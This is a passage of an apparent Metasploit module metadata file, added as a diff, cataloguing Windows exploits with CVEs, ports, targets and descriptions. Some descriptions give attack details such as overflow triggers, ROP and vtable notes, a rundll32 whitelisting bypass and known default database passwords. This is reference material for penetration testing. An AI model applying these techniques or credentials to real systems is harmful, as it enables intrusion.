When SPlayer\n requests the URL of a media file (video or audio), it is possible to gain arbitrary\n remote code execution due to a buffer overflow caused by an exceeding length of data\n as the 'Content-Type' parameter.", + "references": [ + "OSVDB-72181", + "EDB-17243" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/XP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/splayer_content_type.rb", + "is_install_path": true, + "ref_name": "windows/misc/splayer_content_type", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/stream_down_bof": { + "name": "CoCSoft StreamDown 6.8.0 Buffer Overflow", + "fullname": "exploit/windows/misc/stream_down_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-12-27", + "type": "exploit", + "author": [ + "Fady Mohamed Osman " + ], + "description": "Stream Down 6.8.0 seh based buffer overflow triggered when processing\n the server response packet. 
During the overflow a structured exception\n handler is overwritten.", + "references": [ + "CVE-2011-5052", + "OSVDB-78043", + "BID-51190", + "URL-http://www.dark-masters.tk/", + "URL-http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343", + "EDB-18283" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "StreamDown 6.8.0" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/misc/stream_down_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/stream_down_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/talkative_response": { + "name": "Talkative IRC v0.4.4.16 Response Buffer Overflow", + "fullname": "exploit/windows/misc/talkative_response", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-03-17", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n When a specially crafted response string is sent to a client,\n an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-64582", + "BID-34141", + "EDB-8227" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/talkative_response.rb", + "is_install_path": true, + "ref_name": "windows/misc/talkative_response", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/tiny_identd_overflow": { + "name": "TinyIdentD 2.2 Stack Buffer Overflow", + "fullname": "exploit/windows/misc/tiny_identd_overflow", + "aliases": [], + "rank": 200, + 
"disclosure_date": "2007-05-14", + "type": "exploit", + "author": [ + "Maarten Boone", + "Jacopo Cervini " + ], + "description": "This module exploits a stack based buffer overflow in TinyIdentD\n version 2.2.\n If we send a long string to the ident service we can overwrite the\n return address and execute arbitrary code. Credit to Maarten Boone.", + "references": [ + "BID-23981", + "CVE-2007-2711", + "EDB-3925", + "OSVDB-36053" + ], + "platform": "Windows", + "arch": "", + "rport": 113, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 Server SP4 - English", + "Windows 2000 Pro All - English", + "Windows 2000 Pro All - Italian", + "Windows 2000 Pro All - French", + "Windows XP SP0/1 - English", + "Windows XP SP2 - English", + "Windows XP SP2 - Italian" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/tiny_identd_overflow.rb", + "is_install_path": true, + "ref_name": "windows/misc/tiny_identd_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/trendmicro_cmdprocessor_addtask": { + "name": "TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow", + "fullname": "exploit/windows/misc/trendmicro_cmdprocessor_addtask", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-12-07", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Blue" + ], + "description": "This module exploits a vulnerability in the CmdProcessor.exe component of Trend\n Micro Control Manger up to version 5.5.\n\n The specific flaw exists within CmdProcessor.exe service running on TCP port\n 20101. The vulnerable function is the CGenericScheduler::AddTask function of\n cmdHandlerRedAlertController.dll. 
When processing a specially crafted IPC packet,\n controlled data is copied into a 256-byte stack buffer. This can be exploited\n to execute remote code under the context of the user.", + "references": [ + "CVE-2011-5001", + "OSVDB-77585", + "ZDI-11-345" + ], + "platform": "Windows", + "arch": "", + "rport": 20101, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 Server SP2 (DEP Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb", + "is_install_path": true, + "ref_name": "windows/misc/trendmicro_cmdprocessor_addtask", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ufo_ai": { + "name": "UFO: Alien Invasion IRC Client Buffer Overflow", + "fullname": "exploit/windows/misc/ufo_ai", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-10-28", + "type": "exploit", + "author": [ + "Jason Geffner", + "dookie" + ], + "description": "This module exploits a buffer overflow in the IRC client component of\n UFO: Alien Invasion 2.2.1.", + "references": [ + "OSVDB-65689", + "EDB-14013" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ufo_ai.rb", + "is_install_path": true, + "ref_name": "windows/misc/ufo_ai", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/unified_remote_rce": { + "name": "Unified Remote Auth Bypass to RCE", + "fullname": "exploit/windows/misc/unified_remote_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-25", + "type": "exploit", + "author": [ + "h00die", + "H4RK3NZ0" + ], + "description": "This 
module utilizes the Unified Remote remote control protocol to type out and\n deploy a payload. The remote control protocol can be configured to have no passwords,\n a group password, or individual user accounts. If the web page is accessible, the\n access control is set to no password for exploitation, then reverted.\n If the web page is not accessible, exploitation will be tried blindly.\n This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.", + "references": [ + "EDB-49587", + "URL-https://www.unifiedremote.com/", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py", + "CVE-2022-3229" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 9512, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2023-04-16 10:11:01 +0000", + "path": "/modules/exploits/windows/misc/unified_remote_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/unified_remote_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "screen-effects", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/veeam_one_agent_deserialization": { + "name": "Veeam ONE Agent .NET Deserialization", + "fullname": "exploit/windows/misc/veeam_one_agent_deserialization", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-04-15", + "type": "exploit", + "author": [ + "Michael Zanetta", + "Edgar Boda-Majer", + "wvu " + ], + "description": "This module exploits a .NET deserialization vulnerability in the Veeam\n ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the\n 9 and 10 release lines.\n\n Specifically, the module targets the HandshakeResult() method used by\n the Agent. 
By inducing a failure in the handshake, the Agent will\n deserialize untrusted data.\n\n Tested against the pre-patched release of 10.0.0.750. Note that Veeam\n continues to distribute this version but with the patch pre-applied.", + "references": [ + "CVE-2020-10914", + "CVE-2020-10915", + "ZDI-20-545", + "ZDI-20-546", + "URL-https://www.veeam.com/kb3144" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 2805, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-02-16 13:56:50 +0000", + "path": "/modules/exploits/windows/misc/veeam_one_agent_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/misc/veeam_one_agent_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/vmhgfs_webdav_dll_sideload": { + "name": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector", + "fullname": "exploit/windows/misc/vmhgfs_webdav_dll_sideload", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-08-05", + "type": "exploit", + "author": [ + "Yorick Koster" + ], + "description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. 
If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.", + "references": [ + "CVE-2016-5330", + "URL-https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html", + "URL-https://www.vmware.com/in/security/advisories/VMSA-2016-0010.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64", + "Windows x86" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb", + "is_install_path": true, + "ref_name": "windows/misc/vmhgfs_webdav_dll_sideload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/webdav_delivery": { + "name": "Serve DLL via webdav server", + "fullname": "exploit/windows/misc/webdav_delivery", + "aliases": [], + "rank": 0, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ryan Hanson ", + "James Cook " + ], + "description": "This module simplifies the rundll32.exe Application Whitelisting Bypass technique.\n The module creates a webdav server that hosts a dll file. When the user types the provided rundll32\n command on a system, rundll32 will load the dll remotly and execute the provided export function.\n The export function needs to be valid, but the default meterpreter function can be anything.\n The process does write the dll to C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\n but does not load the dll from that location. This file should be removed after execution.\n The extension can be anything you'd like, but you don't have to use one. Two files will be\n written to disk. 
One named the requested name and one with a dll extension attached.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/webdav_delivery.rb", + "is_install_path": true, + "ref_name": "windows/misc/webdav_delivery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/wifi_mouse_rce": { + "name": "Wifi Mouse RCE", + "fullname": "exploit/windows/misc/wifi_mouse_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-25", + "type": "exploit", + "author": [ + "h00die", + "REDHATAUGUST", + "H4RK3NZ0" + ], + "description": "The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the\n authentication is completely implemented entirely on the client side. 
By utilizing\n this vulnerability, is possible to open a program on the server\n (cmd.exe in our case) and type commands that will be executed as the user running\n WiFi Mouse (Mouse Server), resulting in remote code execution.\n\n Tested against versions 1.8.3.4 (current as of module writing) and\n 1.8.2.3.", + "references": [ + "EDB-50972", + "EDB-49601", + "CVE-2022-3218", + "URL-http://wifimouse.necta.us/", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 1978, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "stager" + ], + "mod_time": "2022-09-26 15:45:42 +0000", + "path": "/modules/exploits/windows/misc/wifi_mouse_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/wifi_mouse_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "screen-effects", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/windows_rsh": { + "name": "Windows RSH Daemon Buffer Overflow", + "fullname": "exploit/windows/misc/windows_rsh", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-07-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a vulnerability in Windows RSH daemon 1.8.\n The vulnerability is due to a failure to check for the length of input sent\n to the RSH server. 
A CPORT of 512 -> 1023 must be configured for the exploit\n to be successful.", + "references": [ + "CVE-2007-4006", + "OSVDB-38572", + "BID-25044" + ], + "platform": "Windows", + "arch": "", + "rport": 514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 SP1 English", + "Windows XP Pro SP2 English", + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/windows_rsh.rb", + "is_install_path": true, + "ref_name": "windows/misc/windows_rsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/wireshark_lua": { + "name": "Wireshark console.lua Pre-Loading Script Execution", + "fullname": "exploit/windows/misc/wireshark_lua", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-07-18", + "type": "exploit", + "author": [ + "Haifei Li", + "sinn3r " + ], + "description": "This module exploits a vulnerability in Wireshark 1.6 or less. When opening a\n pcap file, Wireshark will actually check if there's a 'console.lua' file in the same\n directory, and then parse/execute the script if found. 
Versions affected by this\n vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8", + "references": [ + "CVE-2011-3360", + "OSVDB-75347", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136", + "URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Wireshark 1.6.1 or less" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/wireshark_lua.rb", + "is_install_path": true, + "ref_name": "windows/misc/wireshark_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/wireshark_packet_dect": { + "name": "Wireshark packet-dect.c Stack Buffer Overflow", + "fullname": "exploit/windows/misc/wireshark_packet_dect", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-18", + "type": "exploit", + "author": [ + "Paul Makowski", + "sickness", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n by sending a malicious packet.", + "references": [ + "CVE-2011-1591", + "OSVDB-71848", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", + "EDB-17185" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win32 Universal (Generic DEP & ASLR Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb", + "is_install_path": true, + "ref_name": "windows/misc/wireshark_packet_dect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mmsp/ms10_025_wmss_connect_funnel": { + "name": "Windows Media Services 
ConnectFunnel Stack Buffer Overflow", + "fullname": "exploit/windows/mmsp/ms10_025_wmss_connect_funnel", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-04-13", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the Windows Media\n Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n crafted FunnelConnect request, an attacker can execute arbitrary code\n under the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n with Windows 2000 Server, but is not installed by default.\n\n NOTE: This service does NOT restart automatically. Successful, as well as\n unsuccessful exploitation attempts will kill the service which prevents\n additional attempts.", + "references": [ + "CVE-2010-0478", + "OSVDB-63726", + "MSB-MS10-025", + "URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 1755, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb", + "is_install_path": true, + "ref_name": "windows/mmsp/ms10_025_wmss_connect_funnel", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/motorola/timbuktu_fileupload": { + "name": "Timbuktu Pro Directory Traversal/File Upload", + "fullname": "exploit/windows/motorola/timbuktu_fileupload", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-05-10", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a directory traversal vulnerability in Motorola's\n Timbuktu Pro for Windows 8.6.5.", + "references": [ + "CVE-2008-1117", + "OSVDB-43544" + ], + "platform": "Windows", + "arch": "", + "rport": 407, + "autofilter_ports": [], + "autofilter_services": 
[], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/motorola/timbuktu_fileupload.rb", + "is_install_path": true, + "ref_name": "windows/motorola/timbuktu_fileupload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/lyris_listmanager_weak_pass": { + "name": "Lyris ListManager MSDE Weak sa Password", + "fullname": "exploit/windows/mssql/lyris_listmanager_weak_pass", + "aliases": [], + "rank": 600, + "disclosure_date": "2005-12-08", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a weak password vulnerability in the\n Lyris ListManager MSDE install. During installation, the 'sa'\n account password is set to 'lminstall'. Once the install\n completes, it is set to 'lyris' followed by the process\n ID of the installer. This module brute forces all possible\n process IDs that would be used by the installer.", + "references": [ + "CVE-2005-4145", + "OSVDB-21559" + ], + "platform": "Windows", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb", + "is_install_path": true, + "ref_name": "windows/mssql/lyris_listmanager_weak_pass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms02_039_slammer": { + "name": "MS02-039 Microsoft SQL Server Resolution Overflow", + "fullname": "exploit/windows/mssql/ms02_039_slammer", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-07-24", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This is an 
exploit for the SQL Server 2000 resolution\n service buffer overflow. This overflow is triggered by\n sending a udp packet to port 1434 which starts with 0x04 and\n is followed by long string terminating with a colon and a\n number. This module should work against any vulnerable SQL\n Server 2000 or MSDE install (pre-SP3).", + "references": [ + "CVE-2002-0649", + "OSVDB-4578", + "BID-5310", + "MSB-MS02-039" + ], + "platform": "Windows", + "arch": "", + "rport": 1434, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "MSSQL 2000 / MSDE <= SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms02_039_slammer.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms02_039_slammer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms02_056_hello": { + "name": "MS02-056 Microsoft SQL Server Hello Overflow", + "fullname": "exploit/windows/mssql/ms02_056_hello", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-08-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "By sending malformed data to TCP port 1433, an\n unauthenticated remote attacker could overflow a buffer and\n possibly execute code on the server with SYSTEM level\n privileges. 
This module should work against any vulnerable\n SQL Server 2000 or MSDE install (< SP3).", + "references": [ + "CVE-2002-1123", + "OSVDB-10132", + "BID-5411", + "MSB-MS02-056" + ], + "platform": "Windows", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "MSSQL 2000 / MSDE <= SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms02_056_hello.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms02_056_hello", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms09_004_sp_replwritetovarbin": { + "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", + "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-12-09", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. 
In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", + "references": [ + "OSVDB-50589", + "CVE-2008-5416", + "BID-32710", + "MSB-MS09-004", + "EDB-7501" + ], + "platform": "Windows", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic", + "MSSQL 2000 / MSDE SP0 (8.00.194)", + "MSSQL 2000 / MSDE SP1 (8.00.384)", + "MSSQL 2000 / MSDE SP2 (8.00.534)", + "MSSQL 2000 / MSDE SP3 (8.00.760)", + "MSSQL 2000 / MSDE SP4 (8.00.2039)", + "MSSQL 2005 SP0 (9.00.1399.06)", + "MSSQL 2005 SP1 (9.00.2047.00)", + "MSSQL 2005 SP2 (9.00.3042.00)", + "CRASHER" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin", + "check": true, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/ms09_004_sp_replwritetovarbin_sqli": { + "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection", + "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-12-09", + "type": "exploit", + "author": [ + "jduck ", + "Rodrigo Marcos" + ], + "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. 
That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", + "references": [ + "OSVDB-50589", + "CVE-2008-5416", + "BID-32710", + "MSB-MS09-004", + "EDB-7501", + "URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "MSSQL 2000 / MSDE SP0 (8.00.194)", + "MSSQL 2000 / MSDE SP1 (8.00.384)", + "MSSQL 2000 / MSDE SP2 (8.00.534)", + "MSSQL 2000 / MSDE SP3 (8.00.760)", + "MSSQL 2000 / MSDE SP4 (8.00.2039)", + "MSSQL 2005 SP0 (9.00.1399.06)", + "MSSQL 2005 SP1 (9.00.2047.00)", + "MSSQL 2005 SP2 (9.00.3042.00)", + "CRASHER" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb", + "is_install_path": true, + "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/mssql_clr_payload": { + "name": "Microsoft SQL Server Clr Stored Procedure Payload Execution", + "fullname": "exploit/windows/mssql/mssql_clr_payload", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Lee Christensen", + "Nathan Kirk", + "OJ Reeves" + ], + "description": "This module executes an arbitrary native payload on a Microsoft SQL\n server by loading a custom SQL CLR Assembly into the target SQL\n installation, and calling it directly with a base64-encoded payload.\n\n The module requires working credentials in order to connect directly to the\n MSSQL Server.\n\n This method requires the user to have 
sufficient privileges to install a custom\n SQL CRL DLL, and invoke the custom stored procedure that comes with it.\n\n This exploit does not leave any binaries on disk.\n\n Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).", + "references": [ + "URL-https://web.archive.org/web/20200810021536/http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2025-01-09 20:58:40 +0000", + "path": "/modules/exploits/windows/mssql/mssql_clr_payload.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_clr_payload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/mssql_linkcrawler": { + "name": "Microsoft SQL Server Database Link Crawling Command Execution", + "fullname": "exploit/windows/mssql/mssql_linkcrawler", + "aliases": [], + "rank": 500, + "disclosure_date": "2000-01-01", + "type": "exploit", + "author": [ + "Antti Rantasaari ", + "Scott Sutherland \"nullbind\" " + ], + "description": "This module can be used to crawl MS SQL Server database links and deploy\n Metasploit payloads through links configured with sysadmin privileges using a\n valid SQL Server Login.\n\n If you are attempting to obtain multiple reverse shells using this module we\n recommend setting the \"DisablePayloadHandler\" advanced option to \"true\", and setting\n up a 